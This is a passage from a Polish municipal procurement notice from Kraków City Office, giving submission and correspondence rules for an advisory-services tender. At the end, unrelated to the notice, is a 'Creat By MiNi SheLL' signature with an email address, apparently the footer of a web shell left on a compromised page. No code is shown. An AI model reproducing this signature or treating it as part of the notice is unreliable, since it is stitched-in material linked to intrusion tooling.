1.4.	Dokumenty sporządzone w języku obcym winny być składane wraz z tłumaczeniem na język polski, poświadczonym przez osoby upoważnione.
2.	Wniosek należy złożyć w nieprzejrzystej i trwale zamkniętej kopercie lub opakowaniu. Na kopercie lub opakowaniu należy umieścić następujące informacje: Nazwa i adres wykonawcy (ewentualnie pieczęć), Wydział Organizacji i Nadzoru UMK, Oddział Zamówień Publicznych, Znak sprawy: OR-10.3410-61/09, tytuł: Wniosek - Świadczenie usług doradczych. 
3.	Oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują drogą pisemną lub faksem. Korespondencję pisemną należy kierować na adres: Urząd Miasta Krakowa, Wydział Organizacji i Nadzoru, Oddział Zamówień Publicznych, 31-004 Kraków, Plac Wszystkich Świętych 3-4. Korespondencję w formie faksowej należy kierować na numer faksu: (012) 616-1217.
4.	W przypadku konieczności udzielania wyjaśnień dotyczących treści ogłoszenia Zamawiający udzieli wyjaśnień na stronie internetowej http://www.bip.krakow.pl (pod treścią ogłoszenia) pod warunkiem, że prośba o wyjaśnienie treści ogłoszenia wpłynęła do Zamawiającego na nie mniej niż 6 dni przed terminem składania wniosków o dopuszczenie do udziału w niniejszym postępowaniu. Treść zapytań wraz z wyjaśnieniami będzie udostępniona bez ujawniania źródła zapytania.

Creat By MiNi SheLL
Email: jattceo@gmail.com